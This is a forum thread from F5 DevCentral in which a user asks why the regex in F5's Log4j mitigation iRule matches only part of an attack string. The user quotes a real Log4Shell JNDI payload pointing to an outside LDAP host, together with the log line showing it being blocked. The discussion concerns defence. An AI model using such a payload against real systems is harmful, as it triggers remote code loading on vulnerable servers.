Forum Discussion

Nimbostratus

Dec 19, 2021

Log4j iRule mitigation as described in K59329043 - which encoding is the regex using ?

Hi Community, just for my understanding - can someone please clarify which encoding is being used in the regex with F5 release under K59329043 in order to mitigate log4j CVEs exploits ? I...

Nimbostratus

Dec 19, 2021

Hi @Daniel Wolf ,

thank you for your quick reply. Well, I already actually tried to get my answer via regex101.com.

Here what somehow suprises me:

if I type in this string

/${jndi:ldap:/55.55.55.55:1389/Exploit}

which I extracted from a real attack / exploit attempt against one of our production servers:

info tmm[13241]: Rule /Linux/LOG4J-iRULE-BLOCK <HTTP_REQUEST>: log4j_rce_detection drop on URI: /${jndi:ldap:/55.55.55.55:1389/Exploit}

I only get match on the first 3 characters:

Is it meant to be so ? or am I missing something here ?

Thank you for clarifying.

Best Regards

Recent Discussions

Under Attack? F5 Will Help You.
Contacting F5 Support?

DevCentral Quicklinks

* Getting Started on DevCentral
* Community Guidelines
* Community Terms of Use / EULA
* Community Ranking Explained
* Community Resources
* Contact the DevCentral Team
* Update MFA on account.f5.com

Discover DevCentral Connects

* Podcasts
* Social Channels
* Video Streaming

Forum Discussion

Log4j iRule mitigation as described in K59329043 - which encoding is the regex using ?

Recent Discussions

APM with EntraID as idP / request signed

Creating Policy using Terraform

Alert Mail when virtual server down trubleshooting

How to disable RC4 Cipher on SSL

Big-IQ + LetsEncrypt wildcard

Related Content

CitrixBleed Mitigation CVE-2023-4966

F5 Distributed Cloud L3-L7 DDoS Mitigation

JA4 Part 2: Detecting and Mitigating Based on Dynamic JA4 Reputation

Mitigating OWASP API Security risks using BIG-IP

F5 Distributed Cloud - Mitigation for Cross Tenant Origin Exposure (CTOE)

ABOUT DEVCENTRAL

RESOURCES

SUPPORT

PARTNERS